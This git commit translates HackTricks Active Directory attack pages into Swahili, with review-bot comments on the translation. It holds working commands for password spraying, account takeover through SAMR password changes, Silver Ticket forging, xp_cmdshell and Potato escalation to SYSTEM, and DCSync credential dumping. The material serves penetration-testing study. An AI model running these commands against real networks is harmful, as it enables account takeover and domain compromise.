Translated ['src/windows-hardening/active-directory-methodology/password

This commit is contained in:
Translator 2025-09-03 17:21:12 +00:00
parent 0ac79808a3
commit a2560b10d7
4 changed files with 255 additions and 145 deletions


@ -1,7 +1,7 @@
# Kerberos Authentication
# Uthibitishaji wa Kerberos
{{#include ../../banners/hacktricks-training.md}}
**Angalia chapisho la ajabu kutoka:** [**https://www.tarlogic.com/en/blog/how-kerberos-works/**](https://www.tarlogic.com/en/blog/how-kerberos-works/)
**Angalia chapisho la kushangaza kutoka:** [**https://www.tarlogic.com/en/blog/how-kerberos-works/**](https://www.tarlogic.com/en/blog/how-kerberos-works/)
{{#include ../../banners/hacktricks-training.md}}


@ -5,16 +5,16 @@
## **Password Spraying**
Mara tu unapopata **valid usernames** kadhaa unaweza kujaribu **common passwords** zinazotumika zaidi (kumbuka password policy ya mazingira) kwa kila mtumiaji uliyegundua.\
Mara unapopata kadhaa za **valid usernames**, unaweza kujaribu **common passwords** (kumbuka password policy ya mazingira)\
Kwa chaguo-msingi, **minimum** **password** **length** ni **7**.
Orodha za common usernames zinaweza pia kuwa muhimu: [https://github.com/insidetrust/statistically-likely-usernames](https://github.com/insidetrust/statistically-likely-usernames)
Orodha za **common usernames** pia zinaweza kuwa muhimu: [https://github.com/insidetrust/statistically-likely-usernames](https://github.com/insidetrust/statistically-likely-usernames)
Kumbuka kwamba unaweza **could lockout some accounts if you try several wrong passwords** (kwa chaguo-msingi zaidi ya 10).
Kumbuka kwamba unaweza lockout baadhi ya accounts ikiwa utajaribu several wrong passwords (kwa chaguo-msingi zaidi ya 10).
### Pata password policy
Ikiwa una user credentials au shell kama domain user unaweza **get the password policy with**:
Ikiwa una some user credentials au shell kama domain user unaweza kupata password policy kwa:
```bash
# From Linux
crackmapexec <IP> -u 'user' -p 'password' --pass-pol
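Review bot: the rewritten line `Ikiwa una some user credentials au shell kama domain user ...` still carries the English word "some"; drop it or render it as "baadhi ya" so the sentence is fully Swahili. The rewritten lockout sentence (`Kumbuka kwamba unaweza lockout baadhi ya accounts ...`) also loses the bold emphasis the original placed on the lockout warning; keep `**...**` around it so the rendered page still highlights the risk of locking accounts.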
@ -47,16 +47,16 @@ crackmapexec smb --local-auth 10.10.10.10/23 -u administrator -H 10298e182387f9c
# Brute-Force
./kerbrute_linux_amd64 bruteuser -d lab.ropnop.com [--dc 10.10.10.10] passwords.lst thoffman
```
- [**spray**](https://github.com/Greenwolf/Spray) _**(unaweza kubainisha idadi ya jaribio ili kuepuka lockouts):**_
- [**spray**](https://github.com/Greenwolf/Spray) _**(unaweza kubainisha idadi ya jaribio ili kuepuka kufungiwa):**_
```bash
spray.sh -smb <targetIP> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes> <DOMAIN>
```
- Kutumia [**kerbrute**](https://github.com/TarlogicSecurity/kerbrute) (python) - HAIPENDEKEZWI, WAKATI MENGINE HAIFANYI KAZI
- Kutumia [**kerbrute**](https://github.com/TarlogicSecurity/kerbrute) (python) - HAIPENDEKEZWI; WAKATI MWINGINE HAIFANYI KAZI
```bash
python kerbrute.py -domain jurassic.park -users users.txt -passwords passwords.txt -outputfile jurassic_passwords.txt
python kerbrute.py -domain jurassic.park -users users.txt -password Password123 -outputfile jurassic_passwords.txt
```
- Kwa kutumia moduli ya `scanner/smb/smb_login` ya **Metasploit**:
- Kwa moduli ya `scanner/smb/smb_login` ya **Metasploit**:
![](<../../images/image (745).png>)
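Review bot: the kerbrute command in this hunk changes from `-passwords passwords.txt` to `-password Password123`, which turns the list-based spray into a single-password spray; that is a change of the example's behaviour, not a translation, so either revert it or confirm that the single-password flag is intended and actually supported by the tool. The wording fixes on the spray and kerbrute bullets (`kufungiwa`, `WAKATI MWINGINE`) look fine.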
@ -67,9 +67,9 @@ for u in $(cat users.txt); do
rpcclient -U "$u%Welcome1" -c "getusername;quit" 10.10.10.10 | grep Authority;
done
```
#### Kutoka Windows
#### Kutoka kwa Windows
- Na [Rubeus](https://github.com/Zer1t0/Rubeus) toleo lenye brute module:
- Kwa [Rubeus](https://github.com/Zer1t0/Rubeus) version with brute module:
```bash
# with a list of users
.\Rubeus.exe brute /users:<users_file> /passwords:<passwords_file> /domain:<domain_name> /outfile:<output_file>
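Review bot: `Kwa [Rubeus](...) version with brute module:` leaves "version with brute module" in English where the removed line already had a Swahili rendering (`toleo lenye brute module`); keep the translated form.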
@ -77,31 +77,63 @@ done
# check passwords for all users in current domain
.\Rubeus.exe brute /passwords:<passwords_file> /outfile:<output_file>
```
- Kwa kutumia [**Invoke-DomainPasswordSpray**](https://github.com/dafthack/DomainPasswordSpray/blob/master/DomainPasswordSpray.ps1) (Inaweza kuunda watumiaji kutoka kwa domain kwa chaguo-msingi na itapata sera ya nywila kutoka kwa domain na kuweka kikomo kwa majaribio kulingana nayo):
- Kwa [**Invoke-DomainPasswordSpray**](https://github.com/dafthack/DomainPasswordSpray/blob/master/DomainPasswordSpray.ps1) (Inaweza kuunda watumiaji kutoka kwenye domain kwa chaguo-msingi na itapata sera ya nywila kutoka kwenye domain na itaweka kikomo kwa idadi ya majaribio kulingana nayo):
```bash
Invoke-DomainPasswordSpray -UserList .\users.txt -Password 123456 -Verbose
```
- Kwa kutumia [**Invoke-SprayEmptyPassword.ps1**](https://github.com/S3cur3Th1sSh1t/Creds/blob/master/PowershellScripts/Invoke-SprayEmptyPassword.ps1)
- Kwa [**Invoke-SprayEmptyPassword.ps1**](https://github.com/S3cur3Th1sSh1t/Creds/blob/master/PowershellScripts/Invoke-SprayEmptyPassword.ps1)
```
Invoke-SprayEmptyPassword
```
### Tambua na Uchukue Udhibiti wa Akaunti "Password must change at next logon" (SAMR)
Mbinu ya kimyakimya ni spray password isiyo hatari/tupu na kushika akaunti zinazorudisha STATUS_PASSWORD_MUST_CHANGE, ambayo inaonyesha kuwa password iliexpire kwa nguvu na inaweza kubadilishwa bila kujua ile ya zamani.
Mchakato:
- Orodhesha watumiaji (RID brute via SAMR) ili kujenga orodha ya malengo:
{{#ref}}
../../network-services-pentesting/pentesting-smb/rpcclient-enumeration.md
{{#endref}}
```bash
# NetExec (null/guest) + RID brute to harvest users
netexec smb <dc_fqdn> -u '' -p '' --rid-brute | awk -F'\\\\| ' '/SidTypeUser/ {print $3}' > users.txt
```
- Spray password tupu na endelea kwenye hits ili kunyakua accounts ambazo zinapaswa kubadilishwa wakati wa next logon:
```bash
# Will show valid, lockout, and STATUS_PASSWORD_MUST_CHANGE among results
netexec smb <DC.FQDN> -u users.txt -p '' --continue-on-success
```
- Kwa kila hit, badilisha password kupitia SAMR kwa module ya NetExec (hakuna old password inahitajika wakati "must change" imewekwa):
```bash
# Strong complexity to satisfy policy
env NEWPASS='P@ssw0rd!2025#' ; \
netexec smb <DC.FQDN> -u <User> -p '' -M change-password -o NEWPASS="$NEWPASS"
# Validate and retrieve domain password policy with the new creds
netexec smb <DC.FQDN> -u <User> -p "$NEWPASS" --pass-pol
```
Vidokezo vya operesheni:
- Hakikisha saa ya host yako iko sawa na saa ya DC kabla ya operesheni zinazotegemea Kerberos: `sudo ntpdate <dc_fqdn>`.
- [+] bila (Pwn3d!) katika baadhi ya modules (kwa mfano, RDP/WinRM) ina maana creds ni sahihi lakini akaunti haina interactive logon rights.
## Brute Force
```bash
legba kerberos --target 127.0.0.1 --username admin --password wordlists/passwords.txt --kerberos-realm example.org
```
### Kerberos pre-auth spraying na LDAP targeting na PSO-aware throttling (SpearSpray)
Kerberos pre-authbased spraying hupunguza kelele ikilinganishwa na majaribio ya kuunga SMB/NTLM/LDAP na inalingana vizuri zaidi na sera za kufunga akaunti za AD. SpearSpray inachanganya LDAP-driven targeting, injini ya pattern, na ufahamu wa sera (domain policy + PSOs + badPwdCount buffer) ili kuspray kwa usahihi na kwa usalama. Pia inaweza kuweka lebo kwa principals walioathiriwa kwenye Neo4j kwa ajili ya BloodHound pathing.
Kerberos pre-authbased spraying inapunguza kelele ikilinganishwa na SMB/NTLM/LDAP bind attempts na inaendana vizuri zaidi na AD lockout policies. SpearSpray inaunganisha LDAP-driven targeting, injini ya pattern, na uelewa wa sera (domain policy + PSOs + badPwdCount buffer) ili kuspray kwa usahihi na kwa usalama. Inaweza pia ku-tag compromised principals katika Neo4j kwa BloodHound pathing.
Mawazo muhimu:
- Ugundaji wa watumiaji kupitia LDAP na paging na msaada wa LDAPS, kwa hiari kutumia vichujio vya LDAP vilivyobinafsishwa.
- Sera ya kufunga akaunti ya domain + kuchuja kwa kuzingatia PSO ili kuacha buffer ya majaribio inayoweza kusanidiwa (threshold) na kuepuka kufunga watumiaji.
- Thibitisho la Kerberos pre-auth likitumia fast gssapi bindings (huunda 4768/4771 kwenye DCs badala ya 4625).
- Uundaji wa nywila unaotegemea pattern, kwa kila mtumiaji kwa kutumia vigezo kama majina na thamani za muda zinazotokana na pwdLastSet ya kila mtumiaji.
- Udhibiti wa throughput kwa kutumia threads, jitter, na max requests per second.
- Uunganishaji wa hiari na Neo4j kuorodhesha watumiaji waliotekwa kwa BloodHound.
- LDAP user discovery with paging and LDAPS support, optionally using custom LDAP filters.
- Domain lockout policy + PSO-aware filtering ili kuacha buffer ya jaribio inayoweza kusanidiwa (kizingiti) na kuepuka kufunga watumiaji.
- Kerberos pre-auth validation using fast gssapi bindings (generates 4768/4771 on DCs instead of 4625).
- Pattern-based, per-user password generation using variables like names and temporal values derived from each users pwdLastSet.
- Throughput control with threads, jitter, and max requests per second.
- Optional Neo4j integration to mark owned users for BloodHound.
Matumizi ya msingi na ugundaji:
Matumizi ya msingi na ugunduzi:
```bash
# List available pattern variables
spearspray -l
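Review bot: in the new SAMR change-password snippet, `env NEWPASS='P@ssw0rd!2025#' ; \` does not set `NEWPASS` in the calling shell (`env VAR=value` with no command only prints the environment), so the following `-o NEWPASS="$NEWPASS"` and `-p "$NEWPASS"` expand to empty strings; use a plain shell assignment `NEWPASS='P@ssw0rd!2025#'` (or `export NEWPASS=...`) instead. Further points in this hunk: the `Invoke-SprayEmptyPassword` fence has no language tag while every other block on the page uses ```bash; the rewritten SpearSpray bullet list (`LDAP user discovery with paging ...`, `Kerberos pre-auth validation using fast gssapi bindings ...`, and so on) replaces lines that were already fully in Swahili with mostly English ones, which is a regression for a translation commit; `pre-authbased` is missing its hyphen (`pre-auth-based`) in both the old and new paragraph; and `each users pwdLastSet` needs the apostrophe (`each user's pwdLastSet`) if the English bullet is kept.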
@ -112,7 +144,7 @@ spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local
# LDAPS (TCP/636)
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local --ssl
```
Kulenga na udhibiti wa mtindo:
Kulenga na udhibiti wa muundo:
```bash
# Custom LDAP filter (e.g., target specific OU/attributes)
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local \
@ -121,7 +153,7 @@ spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local
# Use separators/suffixes and an org token consumed by patterns via {separator}/{suffix}/{extra}
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local -sep @-_ -suf !? -x ACME
```
Udhibiti wa kuficha na usalama:
Vidhibiti vya kujificha na usalama:
```bash
# Control concurrency, add jitter, and cap request rate
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local -t 5 -j 3,5 --max-rps 10
@ -129,7 +161,7 @@ spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local
# Leave N attempts in reserve before lockout (default threshold: 2)
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local -thr 2
```
Kuongeza taarifa kwa Neo4j/BloodHound:
Neo4j/BloodHound uboreshaji wa data:
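Review bot: `Neo4j/BloodHound uboreshaji wa data:` puts the English noun phrase first, which reads as untranslated word order in Swahili; the removed line `Kuongeza taarifa kwa Neo4j/BloodHound:` was the more natural form and should be kept.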
```bash
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local -nu neo4j -np bloodhound --uri bolt://localhost:7687
```
@ -142,29 +174,29 @@ Muhtasari wa mfumo wa pattern (patterns.txt):
{samaccountname}
{extra}{separator}{year}{suffix}
```
Vigezo vinavyopatikana ni pamoja na:
Available variables include:
- {name}, {samaccountname}
- Muda kutoka kwa pwdLastSet ya kila mtumiaji (au whenCreated): {year}, {short_year}, {month_number}, {month_en}, {season_en}
- Msaidizi wa muundo na tokeni ya shirika: {separator}, {suffix}, {extra}
- Temporal from each users pwdLastSet (or whenCreated): {year}, {short_year}, {month_number}, {month_en}, {season_en}
- Composition helpers and org token: {separator}, {suffix}, {extra}
Vidokezo vya uendeshaji:
- Pendelea kuchunguza PDC-emulator kwa kutumia -dc ili kusoma badPwdCount na taarifa zinazohusiana na sera zilizo na mamlaka zaidi.
- Urejeshaji wa badPwdCount unachochewa kwenye jaribio lijalo baada ya dirisha la uchunguzi; tumia kikomo na upangaji wa muda ili kukaa salama.
- Jaribio za Kerberos pre-auth zinaonekana kama 4768/4771 katika DC telemetry; tumia jitter na rate-limiting ili kujichanganya.
Operational notes:
- Pendelea kuuliza PDC-emulator kwa -dc ili kusoma badPwdCount yenye uhalali zaidi na taarifa zinazohusiana na sera.
- Urejeshaji wa badPwdCount unasababishwa kwenye jaribio lijalo baada ya dirisha la uchunguzi; tumia threshold na timing ili kuwa salama.
- Majaribio ya Kerberos pre-auth yanaonekana kama 4768/4771 katika DC telemetry; tumia jitter na rate-limiting ili kujizungusha.
> Vidokezo: Vipimo vya ukurasa wa LDAP vya chaguo-msingi vya SpearSpray ni 200; rekebisha kwa -lps inapobidi.
> Kidokezo: SpearSprays default LDAP page size is 200; rekebisha na -lps inapohitajika.
## Outlook Web Access
Kuna zana kadhaa za p**assword spraying outlook**.
There are multiples tools for p**assword spraying outlook**.
- Kwa [MSF Owa_login](https://www.rapid7.com/db/modules/auxiliary/scanner/http/owa_login/)
- kwa [MSF Owa_ews_login](https://www.rapid7.com/db/modules/auxiliary/scanner/http/owa_ews_login/)
- Kwa [Ruler](https://github.com/sensepost/ruler) (inayotegemewa!)
- Kwa [DomainPasswordSpray](https://github.com/dafthack/DomainPasswordSpray) (Powershell)
- Kwa [MailSniper](https://github.com/dafthack/MailSniper) (Powershell)
- Kwa kutumia [MSF Owa_login](https://www.rapid7.com/db/modules/auxiliary/scanner/http/owa_login/)
- Kwa kutumia [MSF Owa_ews_login](https://www.rapid7.com/db/modules/auxiliary/scanner/http/owa_ews_login/)
- Kwa kutumia [Ruler](https://github.com/sensepost/ruler) (inayotegemewa!)
- Kwa kutumia [DomainPasswordSpray](https://github.com/dafthack/DomainPasswordSpray) (Powershell)
- Kwa kutumia [MailSniper](https://github.com/dafthack/MailSniper) (Powershell)
Ili kutumia mojawapo ya zana hizi, unahitaji orodha ya watumiaji na password / orodha ndogo ya passwords to spray.
Ili kutumia yoyote ya zana hizi, unahitaji orodha ya watumiaji na password / orodha ndogo ya passwords za spray.
```bash
./ruler-linux64 --domain reel2.htb -k brute --users users.txt --passwords passwords.txt --delay 0 --verbose
[x] Failed: larsson:Summer2020
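Review bot: several lines this hunk replaces were already in Swahili and come back in English (`Available variables include:`, `Temporal from each users pwdLastSet ...`, `Composition helpers and org token: ...`, `Operational notes:`, `There are multiples tools for ...`), so the net effect is a translation regression; restore the removed Swahili versions. The misplaced bold marker in `p**assword spraying outlook**` survives in both versions and should be `**password spraying outlook**`; `SpearSprays` needs its apostrophe (`SpearSpray's`) and `multiples tools` should be `multiple tools` wherever the English line is kept.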
@ -183,7 +215,7 @@ Ili kutumia mojawapo ya zana hizi, unahitaji orodha ya watumiaji na password / o
- [https://github.com/Rhynorater/Okta-Password-Sprayer](https://github.com/Rhynorater/Okta-Password-Sprayer)
- [https://github.com/knavesec/CredMaster](https://github.com/knavesec/CredMaster)
## Marejeleo
## Marejeo
- [https://github.com/sikumy/spearspray](https://github.com/sikumy/spearspray)
- [https://github.com/TarlogicSecurity/kerbrute](https://github.com/TarlogicSecurity/kerbrute)
@ -194,6 +226,7 @@ Ili kutumia mojawapo ya zana hizi, unahitaji orodha ya watumiaji na password / o
- [https://www.ired.team/offensive-security/initial-access/password-spraying-outlook-web-access-remote-shell](https://www.ired.team/offensive-security/initial-access/password-spraying-outlook-web-access-remote-shell)
- [www.blackhillsinfosec.com/?p=5296](https://www.blackhillsinfosec.com/?p=5296)
- [https://hunter2.gitbook.io/darthsidious/initial-access/password-spraying](https://hunter2.gitbook.io/darthsidious/initial-access/password-spraying)
- [HTB Sendai 0xdf: from spray to gMSA to DA/SYSTEM](https://0xdf.gitlab.io/2025/08/28/htb-sendai.html)
{{#include ../../banners/hacktricks-training.md}}


@ -2,17 +2,18 @@
{{#include ../../banners/hacktricks-training.md}}
## Silver ticket
Shambulio la **Silver Ticket** linahusisha unyakuzi wa tiketi za huduma katika mazingira ya Active Directory (AD). Njia hii inategemea **kupata hash ya NTLM ya akaunti ya huduma**, kama akaunti ya kompyuta, ili kuunda tiketi ya Ticket Granting Service (TGS). Kwa tiketi hii iliyoundwa, mshambuliaji anaweza kufikia huduma maalum kwenye mtandao, **akijifanya kuwa mtumiaji yeyote**, kwa kawaida akilenga haki za usimamizi. Inasisitizwa kwamba kutumia funguo za AES kwa ajili ya kuunda tiketi ni salama zaidi na si rahisi kugundulika.
Shambulio la **Silver Ticket** linahusisha matumizi mabaya ya service tickets katika Active Directory (AD) mazingira. Mbinu hii inategemea **kupata NTLM hash ya service account**, kama account ya kompyuta, ili kutengeneza Ticket Granting Service (TGS) ticket. Kwa ticket hii iliyotengenezwa, mshambuliaji anaweza kupata huduma maalumu kwenye mtandao, **kujifanya mtumiaji yeyote**, kwa kawaida akilenga vibali vya kiutawala. Inasisitizwa kwamba kutumia AES keys kutengeneza tiketi ni salama zaidi na kunagundulika kwa shida.
> [!WARNING]
> Silver Tickets ni rahisi kidogo kugundulika kuliko Golden Tickets kwa sababu zinahitaji tu **hash ya akaunti ya huduma**, si akaunti ya krbtgt. Hata hivyo, zinapungukiwa na huduma maalum wanazolenga. Aidha, kuiba tu nenosiri la mtumiaji.
Zaidi ya hayo, ikiwa unavunja **nenosiri la akaunti na SPN** unaweza kutumia nenosiri hilo kuunda Silver Ticket ukijifanya kuwa mtumiaji yeyote kwa huduma hiyo.
> Silver Tickets zinaonekana kwa ugunduzi mdogo kuliko Golden Tickets kwa sababu zinahitaji tu **hash ya service account**, sio akaunti ya krbtgt. Hata hivyo, zimepungukiwa kwa huduma maalumu wanayolenga. Aidha, ikiwa utaiba nenosiri la akaunti yenye SPN unaweza kutumia nenosiri hilo kuunda Silver Ticket inayojifanya mtumiaji yeyote kwa huduma hiyo.
Kwa ajili ya kuunda tiketi, zana tofauti zinatumika kulingana na mfumo wa uendeshaji:
Kwa utengenezaji wa tiketi, zana tofauti zinatumiwa kulingana na mfumo wa uendeshaji:
### On Linux
### Kwenye Linux
```bash
python ticketer.py -nthash <HASH> -domain-sid <DOMAIN_SID> -domain <DOMAIN> -spn <SERVICE_PRINCIPAL_NAME> <USER>
export KRB5CCNAME=/root/impacket-examples/<TICKET_NAME>.ccache
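Review bot: `katika Active Directory (AD) mazingira` follows English word order; the removed line's `katika mazingira ya Active Directory (AD)` is the correct Swahili placement and should be kept. Folding the former second warning sentence into the single `> ` blockquote line is an improvement, since the previous version left that sentence outside the callout.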
@ -35,18 +36,50 @@ mimikatz.exe "kerberos::ptt <TICKET_FILE>"
# Obtain a shell
.\PsExec.exe -accepteula \\<TARGET> cmd
```
The CIFS service is highlighted as a common target for accessing the victim's file system, but other services like HOST and RPCSS can also be exploited for tasks and WMI queries.
Huduma ya CIFS imeonyeshwa kama lengo la kawaida la kupata mfumo wa faili wa mwathiriwa, lakini huduma nyingine kama HOST na RPCSS pia zinaweza kutumika kwa ajili ya kazi na maombi ya WMI.
## Available Services
### Example: MSSQL service (MSSQLSvc) + Potato to SYSTEM
Kama una hash ya NTLM (au ufunguo wa AES) wa akaunti ya huduma ya SQL (kwa mfano, sqlsvc) unaweza kutengeneza TGS kwa MSSQL SPN na kujifanya mtumiaji yeyote kwa huduma ya SQL. Kutoka hapo, wezesha xp_cmdshell ili kutekeleza amri kama akaunti ya huduma ya SQL. Ikiwa token hiyo ina SeImpersonatePrivilege, unganisha Potato ili kupandisha hadhi hadi SYSTEM.
```bash
# Forge a silver ticket for MSSQLSvc (RC4/NTLM example)
python ticketer.py -nthash <SQLSVC_RC4> -domain-sid <DOMAIN_SID> -domain <DOMAIN> \
-spn MSSQLSvc/<host.fqdn>:1433 administrator
export KRB5CCNAME=$PWD/administrator.ccache
# Connect to SQL using Kerberos and run commands via xp_cmdshell
impacket-mssqlclient -k -no-pass <DOMAIN>/administrator@<host.fqdn>:1433 \
-q "EXEC sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;EXEC xp_cmdshell 'whoami'"
```
- Ikiwa muktadha unaopatikana una SeImpersonatePrivilege (mara nyingi ni kweli kwa akaunti za huduma), tumia toleo la Potato kupata SYSTEM:
```bash
# On the target host (via xp_cmdshell or interactive), run e.g. PrintSpoofer/GodPotato
PrintSpoofer.exe -c "cmd /c whoami"
# or
GodPotato -cmd "cmd /c whoami"
```
Maelezo zaidi kuhusu kutumia vibaya MSSQL na kuwezesha xp_cmdshell:
{{#ref}}
abusing-ad-mssql.md
{{#endref}}
Muhtasari wa mbinu za Potato:
{{#ref}}
../windows-local-privilege-escalation/roguepotato-and-printspoofer.md
{{#endref}}
## Huduma Zinazopatikana
| Service Type | Service Silver Tickets |
| ------------------------------------------ | -------------------------------------------------------------------------- |
| WMI | <p>HOST</p><p>RPCSS</p> |
| PowerShell Remoting | <p>HOST</p><p>HTTP</p><p>Kulingana na OS pia:</p><p>WSMAN</p><p>RPCSS</p> |
| WinRM | <p>HOST</p><p>HTTP</p><p>Katika matukio mengine unaweza tu kuuliza: WINRM</p> |
| PowerShell Remoting | <p>HOST</p><p>HTTP</p><p>Kulingana na OS pia:</p><p>WSMAN</p><p>RPCSS</p> |
| WinRM | <p>HOST</p><p>HTTP</p><p>Katika baadhi ya matukio unaweza kuomba tu: WINRM</p> |
| Scheduled Tasks | HOST |
| Windows File Share, also psexec | CIFS |
| LDAP operations, included DCSync | LDAP |
| LDAP operations, included DCSync | <p>LDAP</p><p>ikiwa ni pamoja na DCSync</p> |
| Windows Remote Server Administration Tools | <p>RPCSS</p><p>LDAP</p><p>CIFS</p> |
| Golden Tickets | krbtgt |
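Review bot: the new `impacket-mssqlclient -k -no-pass <DOMAIN>/administrator@<host.fqdn>:1433 -q "..."` line should be verified against the installed impacket release before it ships: the port is given inside the target string and the query is passed with `-q`, and if mssqlclient expects `-port` and `-command` instead, the example will not run as written. Also, the heading `### Example: MSSQL service (MSSQLSvc) + Potato to SYSTEM` stays in English while its body is translated, and the new LDAP table cell `<p>LDAP</p><p>ikiwa ni pamoja na DCSync</p>` repeats the `included DCSync` already in the row's first column.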
@ -54,30 +87,29 @@ Using **Rubeus** you may **ask for all** these tickets using the parameter:
- `/altservice:host,RPCSS,http,wsman,cifs,ldap,krbtgt,winrm`
### Silver tickets Event IDs
### Vitambulisho vya Matukio vya Silver Tickets
- 4624: Account Logon
- 4634: Account Logoff
- 4672: Admin Logon
- 4624: Kuingia kwa Akaunti
- 4634: Kuondoka/Kutoka kwa Akaunti
- 4672: Kuingia kwa Admin
## Persistence
## Uendelevu
To avoid machines from rotating their password every 30 days set `HKLM\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters\DisablePasswordChange = 1` or you could set `HKLM\SYSTEM\CurrentControlSet\Services\NetLogon\Parameters\MaximumPasswordAge` to a bigger value than 30days to indicate the rotation perdiod when the machines password should be rotated.
Ili kuzuia mashine zisibadilishe nywila kila baada ya siku 30 weka `HKLM\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters\DisablePasswordChange = 1` au unaweza kuweka `HKLM\SYSTEM\CurrentControlSet\Services\NetLogon\Parameters\MaximumPasswordAge` kwa thamani kubwa kuliko siku 30 kuonyesha kipindi cha mzunguko ambacho nywila ya mashine inapaswa kubadilishwa.
## Abusing Service tickets
In the following examples lets imagine that the ticket is retrieved impersonating the administrator account.
Katika mifano iliyofuata tufikirie tiketi imepatikana kwa kuigiza akaunti ya administrator.
### CIFS
With this ticket you will be able to access the `C$` and `ADMIN$` folder via **SMB** (if they are exposed) and copy files to a part of the remote filesystem just doing something like:
Kwa tiketi hii utaweza kufikia folda za `C$` na `ADMIN$` kupitia **SMB** (ikiwa zime wazi) na kunakili mafaili kwenye sehemu ya mfumo wa faili wa mbali kwa kufanya kitu kama:
```bash
dir \\vulnerable.computer\C$
dir \\vulnerable.computer\ADMIN$
copy afile.txt \\vulnerable.computer\C$\Windows\Temp
```
Utapata pia uwezo wa kupata shell ndani ya mwenyeji au kutekeleza amri za kawaida ukitumia **psexec**:
Pia utaweza kupata shell ndani ya host au kutekeleza amri zozote kwa kutumia **psexec**:
{{#ref}}
../lateral-movement/psexec-and-winexec.md
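Review bot: `ikiwa zime wazi` is ungrammatical; it should read `ikiwa ziko wazi`. `4634: Kuondoka/Kutoka kwa Akaunti` hedges between two translations with a slash; pick one (`Kutoka kwa Akaunti`). The rest of the hunk (persistence paragraph, CIFS and psexec sentences) reads fine, and the `perdiod` typo disappears with the old English line.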
@ -85,7 +117,7 @@ Utapata pia uwezo wa kupata shell ndani ya mwenyeji au kutekeleza amri za kawaid
### HOST
Kwa ruhusa hii unaweza kuunda kazi zilizopangwa katika kompyuta za mbali na kutekeleza amri za kawaida:
Kwa ruhusa hii unaweza kuunda kazi zilizopangwa kwenye kompyuta za mbali na kutekeleza amri zozote:
```bash
#Check you have permissions to use schtasks over a remote server
schtasks /S some.vuln.pc
@ -99,7 +131,7 @@ schtasks /Run /S mcorp-dc.moneycorp.local /TN "SomeTaskName"
```
### HOST + RPCSS
Kwa tiketi hizi unaweza **kutekeleza WMI katika mfumo wa mwathirika**:
Kwa tikiti hizi unaweza **kutekeleza WMI kwenye mfumo wa mwathiriwa**:
```bash
#Check you have enough privileges
Invoke-WmiMethod -class win32_operatingsystem -ComputerName remote.computer.local
@ -109,7 +141,8 @@ Invoke-WmiMethod win32_process -ComputerName $Computer -name create -argumentlis
#You can also use wmic
wmic remote.computer.local list full /format:list
```
Pata **maelezo zaidi kuhusu wmiexec** katika ukurasa ufuatao:
Pata **maelezo zaidi kuhusu wmiexec** kwenye ukurasa ufuatao:
{{#ref}}
../lateral-movement/wmiexec.md
@ -117,11 +150,11 @@ Pata **maelezo zaidi kuhusu wmiexec** katika ukurasa ufuatao:
### HOST + WSMAN (WINRM)
Kwa ufikiaji wa winrm juu ya kompyuta unaweza **kuipata** na hata kupata PowerShell:
Ikiwa una ufikiaji wa winrm kwenye kompyuta unaweza **kuifikia** na hata kupata PowerShell:
```bash
New-PSSession -Name PSC -ComputerName the.computer.name; Enter-PSSession PSC
```
Check the following page to learn **njia zaidi za kuungana na mwenyeji wa mbali kwa kutumia winrm**:
Check the following page to learn **njia zaidi za kuunganishwa na mwenyeji wa mbali ukitumia winrm**:
{{#ref}}
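Review bot: `Check the following page to learn **njia zaidi za kuunganishwa ...**` is still half English; the leading clause should become Swahili too (e.g. `Angalia ukurasa ufuatao ili kujifunza ...`) so the sentence is not mixed-language. The reworded winrm sentence (`Ikiwa una ufikiaji wa winrm ...`) is fine.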
@ -129,11 +162,11 @@ Check the following page to learn **njia zaidi za kuungana na mwenyeji wa mbali
{{#endref}}
> [!WARNING]
> Note that **winrm lazima iwe hai na inasikiliza** kwenye kompyuta ya mbali ili kuweza kuipata.
> Kumbuka kwamba **winrm lazima iwe imewezeshwa na ikisikiliza** kwenye kompyuta ya mbali ili kuifikia.
### LDAP
With this privilege you can dump the DC database using **DCSync**:
Kwa ruhusa hii unaweza dump DC database ukitumia **DCSync**:
```
mimikatz(commandline) # lsadump::dcsync /dc:pcdc.domain.local /domain:domain.local /user:krbtgt
```
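Review bot: `Kwa ruhusa hii unaweza dump DC database ukitumia **DCSync**:` leaves `dump DC database` untranslated (e.g. `kutoa nakala ya hifadhidata ya DC`), and the mimikatz fence below it has no language tag while the rest of the page uses ```bash; tag it for consistent rendering.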
@ -150,6 +183,7 @@ dcsync.md
- [https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-silver-tickets](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-silver-tickets)
- [https://www.tarlogic.com/blog/how-to-attack-kerberos/](https://www.tarlogic.com/blog/how-to-attack-kerberos/)
- [https://techcommunity.microsoft.com/blog/askds/machine-account-password-process/396027](https://techcommunity.microsoft.com/blog/askds/machine-account-password-process/396027)
- [HTB Sendai 0xdf: Silver Ticket + Potato path](https://0xdf.gitlab.io/2025/08/28/htb-sendai.html)


@ -1,17 +1,17 @@
# Windows Security Controls
# Udhibiti wa Usalama wa Windows
{{#include ../../banners/hacktricks-training.md}}
## AppLocker Policy
## Sera ya AppLocker
Orodha ya programu inayoruhusiwa ni orodha ya programu za software au executable zilizothibitishwa ambazo zinaruhusiwa kuwepo na kuendesha kwenye mfumo. Lengo ni kulinda mazingira kutokana na malware hatari na programu zisizothibitishwa ambazo hazilingani na mahitaji maalum ya biashara ya shirika.
Orodha nyeupe ya programu ni orodha ya programu za programu zilizokubaliwa au faili za utekelezaji zinazoruhusiwa kuwepo na kuendeshwa kwenye mfumo. Lengo ni kulinda mazingira dhidi ya malware hatari na programu zisizoruhusiwa ambazo hazilingani na mahitaji maalum ya biashara ya shirika.
